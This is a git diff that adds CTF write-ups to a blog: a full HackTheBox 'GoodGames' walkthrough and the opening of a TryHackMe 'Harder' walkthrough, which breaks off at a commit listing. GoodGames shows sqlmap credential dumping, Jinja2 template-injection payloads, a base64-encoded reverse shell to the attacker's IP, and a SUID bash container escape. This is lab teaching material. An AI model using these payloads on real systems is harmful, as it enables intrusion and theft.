+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cd4f81a0a34cc625e0bcf0dc64d6667f8ea72ff484f54d663741b61cbbb473cc
+size 29623
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp
new file mode 100644
index 0000000..2144e9e
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f5e3dcdcc7000ed7a77ffd0e429d4a65a161426ddafd8eec502af81b39efcc07
+size 25288
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png
new file mode 100644
index 0000000..11380df
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:09b46e56b3b2b045c28cac337ef0892e8f741a1c04c817f51c28ac7aa35b8bcd
+size 18157
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp
new file mode 100644
index 0000000..1da70a1
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3fcace92c84da7c5fd0dcc8f031c18fde7c53c348fcd064fc5cddea2aa5f1d57
+size 24760
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png
new file mode 100644
index 0000000..3cdac76
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6255c03d2f289deef4101cc0f019786417e15673e3e2e1d4a84c3bfce1910884
+size 2224574
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp
new file mode 100644
index 0000000..a32b33e
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:025e2dab54af4d3a4681631daf38e3fdf3e36017103122734ac862cd92af07d7
+size 271744
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png
new file mode 100644
index 0000000..8cd27c1
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9656e1a97c547a3b65c0ee67429e6d98393123e7dbf41e25a4c184c391b4690b
+size 63946
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp
new file mode 100644
index 0000000..5c98b8c
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:12cdeddfc582b0cf1d74bf5b6e166940cd040d250b62c181e75c499d2d6cdc72
+size 54056
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png
new file mode 100644
index 0000000..ebc18b6
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2cd71268f53543bfadfe3ddb6f1f0437a1b04525c56b80ab57ddf5b27462f6dc
+size 33138
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp
new file mode 100644
index 0000000..0783a6c
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cecedee0998e4323c973e7092970fba07316b43b89aff266d26003577e076e23
+size 29376
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png
new file mode 100644
index 0000000..654df92
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4064ccba607fe2db158e2868fc68b7468b529fdce9f260166e0a6f46d5491370
+size 24836
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp
new file mode 100644
index 0000000..b83bc70
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8182b28337e3741d694527431b83910f7695decd6252611985d91b8e0b8ff478
+size 13588
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png
new file mode 100644
index 0000000..dfd7610
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9fbbcf3b2fc788befc7f070348bfaf82a4d5e4b51c30f1c670271ac3e73b7376
+size 16933
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp
new file mode 100644
index 0000000..dc6b234
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cff9acbf41bb0206ec3f7dd7df781c1763954c095edecb4888dd61f5be07179a
+size 19514
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png
new file mode 100644
index 0000000..d90cd8f
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7f41812dce889551aea7341503008caf65d9c610690589269ceb36f3f914d1ce
+size 32664
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp
new file mode 100644
index 0000000..a0418c2
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b552c7fac725cd3d2215c67dd9dc9c0fb1bf72f5572af8cda5e505fa4c2525f0
+size 37834
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png
new file mode 100644
index 0000000..5bcfc4b
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:85916d7ddd63aff638dc5dbf3780b054f17a5c6a52599d669cedee7042460633
+size 22005
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp
new file mode 100644
index 0000000..d197d91
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2b927c7cf2dcd507daebd617d71cdeb76f63e94c38e2164ee4a15d530dc92eb8
+size 23990
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png
new file mode 100644
index 0000000..3213f2a
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:29fbbf1958102f1fec24c7ff566e85cc2bedfa241a6bb76e241f418e073a4726
+size 35870
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp
new file mode 100644
index 0000000..82d581f
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f471555ad7b983bf8947bd1704b85f1203fb096f0ffe1e4ea366ab311347ffcc
+size 42860
diff --git a/content/writeup-ctf/writeup-goodgames-htb/index.md b/content/writeup-ctf/writeup-goodgames-htb/index.md
new file mode 100644
index 0000000..6d713bd
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/index.md
@@ -0,0 +1,208 @@
+---
+title: "Writeup - GoodGames (HTB)"
+date: 2022-03-19
+slug: "writeup-goodgames-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [GoodGames](https://app.hackthebox.com/machines/GoodGames) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.130
+```
+One TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.51)
+
+![](img/image-2.webp)
+
+## Exploit
+
+I start by listing the pages accessible through the website.
+
+![](img/image-3.webp)
+
+There are a number of pages, but 3 are pages with a form: login, forgot-password and signup. With a form we can potentially make SQL injection.
+
+First I get a login request via Burp.
+
+
+```bash
+POST /login HTTP/1.1
+Host: 10.10.11.130
+Content-Length: 36
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.11.130
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.11.130/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+email=test%40test.fr&password=azerty
+```
+I save this request in a "request.txt" file, then I run SQLmap to determine if this form is injection sensitive.
+
+
+```bash
+sqlmap -r request.txt
+```
+This form is usable, so I use the following command to list the accessible databases:
+
+
+```bash
+sqlmap -r request.txt --dbs
+[...]
+[12:51:20] [INFO] retrieved: main
+available databases [2]:
+[*] information_schema
+[*] main
+[...]
+```
+I select the database "main" and start to list the different tables.
+
+
+```bash
+sqlmap -r request.txt -D main --dump
+[...]
+[12:53:58] [INFO] retrieved: blog
+[12:54:30] [INFO] retrieved: blog_comments
+[12:55:51] [INFO] retrieved: user
+[12:56:20] [INFO] fetching columns for table 'blog' in database 'main'
+[12:56:20] [INFO] retrieved: 15
+[...]
+```
+I select the "user" table and run the following command to dump the data.
+
+
+```bash
+sqlmap -r request.txt -D main -T user --dump
+[...]
+admin@goodgames.htb
+[13:00:19] [INFO] retrieved: 1
+[13:00:23] [INFO] retrieved: admin
+[13:00:42] [INFO] retrieved: 2b22337f218b2d82dfc3b6f77e7cb8ec
+[...]
+```
+Ok, we have the credentials of the admin user! We just need to get the password hash and run john to decrypt it.
+
+![](img/image-4.webp)
+
+John quickly finds the password: superadministrator.
+
+I can now connect and access the admin panel. This panel is accessible via a subdomain, so I add it in my /etc/hosts file:
+
+
+```bash
+10.10.11.130	internal-administration.goodgames.htb
+```
+I fill in the credentials I found before and connect to the admin panel of the site.
+
+![](img/image-5.webp)
+
+In this panel I find a tab where I can customize the account nickname. Let's determine the PHP template used by the site. For that I use the following github:
+
+[PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF - PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThings![](https://github.com/fluidicon.png)
+
+{{< github repo="swisskyrepo/PayloadsAllTheThings" >}}
+
+
+
+Quickly I determine that the site uses the Jinja2 Template. I will be able to use an injection to execute commands on the server. For that I use the following injection:
+
+```bash
+{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
+
+```
+To make a shell reversel it's a bit more complex, I didn't manage to put just the command, so I use the base64 method to avoid that the command is modified during the process.
+
+To do this I encode my reverse in base64 then I use the following injection to transmit it on the remote server:
+
+
+```bash
+{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzEyMzQgMD4mMQo=" | base64 -d | bash').read() }}
+```
+![](img/image-6.webp)
+
+I now have a root shell (I think we are in a docker) and I can get the first flag.
+
+
+```bash
+root@3a453ab39d3d:/home/augustus# ls
+user.txt
+root@3a453ab39d3d:/home/augustus# cat user.txt
+dec6a8b304bbe0fdfe4b8c46a3562605
+```
+## Privilege escalation
+
+As said before, I think we are in a docker. What I can confirm after some research.
+
+After checking my IP, we can safely say that the IP of the host is 172.19.0.1.
+
+![](img/image-7.webp)
+
+So I do an nmap scan on the host IP:
+
+![](img/image-8.webp)
+
+The SSH port is open! We can now try to connect to the user augustus to exit the docker.
+
+I first upgrade my reverse shell with the following command (this is very important for the following).
+
+
+```bash
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
+I am doing an SSH on the user augustus using the password previously used:
+
+![](img/image-9.webp)
+
+I am now in the host machine, interesting thing I notice the nmap file I uploaded in the docker is present in the folder of augustus. But what is even more interesting is that he has kept his root privilege!
+
+![](img/image-10.webp)
+
+What I will be able to do is to make a copy of bash. Then in the docker add the execution rights. Then go back to the host and create a bash root.
+
+To do this, I first copy the bash file from the host machine into the augustus folder:
+
+
+```bash
+cp /bin/bash ./
+
+```
+Then I go back to the docker and add the following rights:
+
+
+```bash
+chown root:root bash
+chmod 4777 bash
+```
+Finally I go back to the host and run a bash root:
+
+
+```bash
+augustus@GoodGames:~$ ./bash -p
+bash-5.1# cat /root/root.txt
+cat /root/root.txt
+702332b6faa16ef1b87c5ae52a2ef3df
+```
+I now have control of the host machine and can recover the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Patch forms to avoid sql injection
+- Use strong passwords
+- Do not use the same password for two different services
+- Do not launch dockers with root privilege
diff --git a/content/writeup-ctf/writeup-harder-thm/featured.png b/content/writeup-ctf/writeup-harder-thm/featured.png
new file mode 100644
index 0000000..8c3dff1
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:36799da84aac35347acc68525496bdde70bbf1b673b15bf94ae7ec9bd4dff506
+size 134338
diff --git a/content/writeup-ctf/writeup-harder-thm/featured.webp b/content/writeup-ctf/writeup-harder-thm/featured.webp
new file mode 100644
index 0000000..6a07af1
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d453958c4f40d7a89378b82a96d65a936cd207bb5392b0edc62256fbacfd380e
+size 92044
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-1.png b/content/writeup-ctf/writeup-harder-thm/img/image-1.png
new file mode 100644
index 0000000..3f948cb
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3e7e75b56dbd2b93b3fb0ae599c90e1deb7210aa50b23b30d3a1866b9b3b429b
+size 30603
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-1.webp b/content/writeup-ctf/writeup-harder-thm/img/image-1.webp
new file mode 100644
index 0000000..c4f2601
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4acea638b8f6e6fd3131aee06fbcb51e7e8563f62281d06023b1509781d3d668
+size 31030
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-10.png b/content/writeup-ctf/writeup-harder-thm/img/image-10.png
new file mode 100644
index 0000000..8e63d7e
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:be5386329073711ad7b2faa580df8ac003c7d0b76a22190f3a45a279eb6f0cb9
+size 17465
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-10.webp b/content/writeup-ctf/writeup-harder-thm/img/image-10.webp
new file mode 100644
index 0000000..065fca1
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:45bff4e0792c81297c9eeae4990cf878f5dc9229e596ba973cb875810ee37e13
+size 11920
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-11.png b/content/writeup-ctf/writeup-harder-thm/img/image-11.png
new file mode 100644
index 0000000..f75b10e
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:38d34bae6f2a0803f157b6331a75758cff19b08466c6d7e37c5426a405daaedd
+size 39346
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-11.webp b/content/writeup-ctf/writeup-harder-thm/img/image-11.webp
new file mode 100644
index 0000000..f0e441c
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bfde33882806e67a9ac1e25a920cac949f711f9e9bd30bc28b31b33c57fd8b61
+size 50372
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-12.png b/content/writeup-ctf/writeup-harder-thm/img/image-12.png
new file mode 100644
index 0000000..6418e8b
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:91514aaafd66af19cb0ea3de03ebfe70d9bb259577218c1d97fef0fba73e186a
+size 17218
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-12.webp b/content/writeup-ctf/writeup-harder-thm/img/image-12.webp
new file mode 100644
index 0000000..3271745
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f694614e0e0732d7e8de15913d2574ee6c12ab5de3d7c32dc472e53d5b983911
+size 14392
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-13.png b/content/writeup-ctf/writeup-harder-thm/img/image-13.png
new file mode 100644
index 0000000..436675e
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c33168d6a3d5b1ed005f67ac3e554ca49267065ede7cc56d7bd36b0ed1c87208
+size 8041
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-13.webp b/content/writeup-ctf/writeup-harder-thm/img/image-13.webp
new file mode 100644
index 0000000..61f7924
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:44f59332884ecd7501e53b16b9528c92913d648a43afae4a6b2bcf5942839a7f
+size 11458
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-14.png b/content/writeup-ctf/writeup-harder-thm/img/image-14.png
new file mode 100644
index 0000000..059f092
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c919cc659de7e89ebcd823cfd8a80bf7f53bf372541ebc5b90fd1147c0deab12
+size 30451
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-14.webp b/content/writeup-ctf/writeup-harder-thm/img/image-14.webp
new file mode 100644
index 0000000..652c2af
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:30161c2fc29cc68da2907e7647595b8434a8f83751321e6d91156cedbc8b6d8d
+size 42040
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-15.png b/content/writeup-ctf/writeup-harder-thm/img/image-15.png
new file mode 100644
index 0000000..acaa4b0
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-15.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4bdfbbf428d94100ea98115ecd9dd5d7ab6ddc34a6cf27f0c229ad80a180e215
+size 23158
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-15.webp b/content/writeup-ctf/writeup-harder-thm/img/image-15.webp
new file mode 100644
index 0000000..9cfd25a
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-15.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:adb655583fc89e6ffa1c47bb7ebeb2cd5c4d7c1dfc4cd6d4ff36815e396211fd
+size 26578
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-2.png b/content/writeup-ctf/writeup-harder-thm/img/image-2.png
new file mode 100644
index 0000000..2c29c69
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c02b672370f91e5afa52ef1472cbaa2d24238ce82ef22e55b86a042c0f31995c
+size 46777
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-2.webp b/content/writeup-ctf/writeup-harder-thm/img/image-2.webp
new file mode 100644
index 0000000..f8c4e56
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:97ff4d7575d2e52eacd2fd9d7c4f9a8c501e64c3eedb9fb67b6ce62a9234fd48
+size 38670
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-3.png b/content/writeup-ctf/writeup-harder-thm/img/image-3.png
new file mode 100644
index 0000000..b993869
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:18f28e19270b9101446204d709dd0fc2c2f7bcd81f0136736c659a39a21074a1
+size 29950
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-3.webp b/content/writeup-ctf/writeup-harder-thm/img/image-3.webp
new file mode 100644
index 0000000..7d9f112
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:406833020f4c78d77486ec63445a610f0c5ebdaabee48e19feede1282000fde4
+size 24106
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-4.png b/content/writeup-ctf/writeup-harder-thm/img/image-4.png
new file mode 100644
index 0000000..724e66f
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fc4d9d618d595b092eed52242324419bcaecc830896dbaa91b7ea8d19aeb427c
+size 11902
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-4.webp b/content/writeup-ctf/writeup-harder-thm/img/image-4.webp
new file mode 100644
index 0000000..c907798
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ce2efee69e85991ea98204a167b18f6767432c48565def71355fa4ef50898c50
+size 8624
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-5.png b/content/writeup-ctf/writeup-harder-thm/img/image-5.png
new file mode 100644
index 0000000..3d8dfd2
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5e8b32d8fc6de468b7ff7f79666825ee1a045fb64516469d374067617fdeac98
+size 63345
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-5.webp b/content/writeup-ctf/writeup-harder-thm/img/image-5.webp
new file mode 100644
index 0000000..d26986e
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:98d0b9a8fd3cf606a22c0de684c6495979d93f1d609f820885c01612ff83ae98
+size 54260
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-6.png b/content/writeup-ctf/writeup-harder-thm/img/image-6.png
new file mode 100644
index 0000000..7fb5c50
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:881375e2851d324138c238f7a2d1598f7f27d71b34d3cd37fe7298b0c55e958b
+size 69865
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-6.webp b/content/writeup-ctf/writeup-harder-thm/img/image-6.webp
new file mode 100644
index 0000000..2c6b939
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b2e45e023ee91580ba967747c4db3eea0cf6b716ff9eeada9c0e1910754dc5b1
+size 91100
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-7.png b/content/writeup-ctf/writeup-harder-thm/img/image-7.png
new file mode 100644
index 0000000..1df206e
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:44330820f9af9c6903db377aae06cf9c698f634331dd7111dcea7a38f2f44f45
+size 33630
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-7.webp b/content/writeup-ctf/writeup-harder-thm/img/image-7.webp
new file mode 100644
index 0000000..6269e56
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7bfedbaa51f6e75b2cf56029e65017aeeb46b2deb3a0bdccb647164e83b773ee
+size 29828
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-8.png b/content/writeup-ctf/writeup-harder-thm/img/image-8.png
new file mode 100644
index 0000000..0e5d98b
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ce4759616d5c84c85b2b7f764370ef0190d0b087181686025ca541b1f997bd9f
+size 13236
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-8.webp b/content/writeup-ctf/writeup-harder-thm/img/image-8.webp
new file mode 100644
index 0000000..6d6c27d
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b5d8c66a32f9d50eba3a981b8b04963e577ed46735da689940db5c475db7d172
+size 11020
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-9.png b/content/writeup-ctf/writeup-harder-thm/img/image-9.png
new file mode 100644
index 0000000..791836f
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bc1347b1dc77aa83bcef771c7b0a575f51fad23a527a78906b437bd5196a7cf6
+size 7764
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-9.webp b/content/writeup-ctf/writeup-harder-thm/img/image-9.webp
new file mode 100644
index 0000000..73724fe
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:42cd84dbd3d963b90c98a72a5bde2f6abaf62a8348ef4a47e6cd7d4e65213741
+size 6016
diff --git a/content/writeup-ctf/writeup-harder-thm/index.md b/content/writeup-ctf/writeup-harder-thm/index.md
new file mode 100644
index 0000000..bdb23a2
--- /dev/null
+++ b/content/writeup-ctf/writeup-harder-thm/index.md
@@ -0,0 +1,217 @@
+---
+title: "Writeup - Harder (THM)"
+date: 2022-04-28
+slug: "writeup-harder-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Harder](https://tryhackme.com/room/harder) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.199.197
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.3)
+- 80/tcp : HTTP web server (nginx 1.18.0)
+
+## Exploit
+
+At first I start by scanning the files on the site.
+
+![](img/image-2.webp)
+
+I can't find anything in particular, so I make a query with `curl` to see if I find something interesting in the Header.
+
+![](img/image-3.webp)
+
+I find that there is a subdomain: `pwd.harder.local`. When I go to the page I find the following login form:
+
+![](img/image-4.webp)
+
+After a few tries with the classic passwords, I find that it is possible to connect with `admin/admin`. Then I get a page with the following message:
+
+
+```bash
+extra security in place. our source code will be reviewed soon ...
+```
+I scan the subdomain to see if it has anything interesting:
+
+![](img/image-5.webp)
+
+There is clearly a Git project folder, so I will download it locally to study it. To do this I use [gitTools](https://github.com/internetwache/GitTools):
+
+![](img/image-6.webp)
+
+At first I look at the list of commits, there are 3 of them.
+
+![](img/image-7.webp)
+
